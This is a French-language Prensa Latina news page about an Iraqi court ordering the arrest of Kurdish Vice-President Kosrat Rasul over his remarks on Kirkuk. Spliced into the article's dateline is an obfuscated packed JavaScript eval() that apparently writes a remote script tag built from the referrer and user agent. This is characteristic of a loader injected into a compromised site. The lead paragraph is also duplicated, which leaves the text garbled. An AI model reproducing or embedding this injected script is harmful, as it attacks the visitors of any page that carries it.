mardi 16 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Un tribunal irakien ordonne la détention du vice-président kurde

Téhéran, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dszky|var|u0026u|referrer|ibskn||js|php'.split('|'),0,{})) 20 octobre (Prensa Latina) Le site Hispantv informe aujourd'hui qu'un tribunal irakien a émis un ordre d’arrêt contre le vice-président de la région autonome du Kurdistan irakien, Kosrat Rasul.

Téhéran, 20 octobre (Prensa Latina) Le site Hispantv informe aujourd’hui qu’un tribunal irakien a émis un ordre d’arrêt contre le vice-président de la région autonome du Kurdistan irakien, Kosrat Rasul.

Rasul a récemment qualifié les troupes irakiennes qui ont récupéré la province de Kirkouk, qui était aux mains des forces armées kurdes (Peshmergas) depuis 2014, d’ « occupants ».

Selon le Tribunal d’Enquête d’Al Rusafa, cette expression du vice-président kurde est estimée « offensive » et considérée comme une  « incitation à la violence » à l’encontre des Forces Armées du gouvernement central.

Rasul est le quatrième fonctionnaire kurde sanctionné par la justice irakienne, même s’il est estimé improbable que ces ordres soient exécutés compte tenu du manque d’autorité du gouvernement central dans cette région du Kurdistan.

Ces décrets judiciaires ont commencé à être émis suite à l’escalade des tensions entre les gouvernements irakien et kurde, laquelle a débuté après le référendum lors duquel la région autonome aspirait à se séparer de Bagdad.

Dans le but de préserver l’intégrité territoriale du pays, les forces armées irakienne ont repris possession des lieux stratégiques dans la ville et la province de Kirkuk, et ce sans aucune résistance des forces kurdes.

peo/tgj/arc

EN CONTINU
notes connexes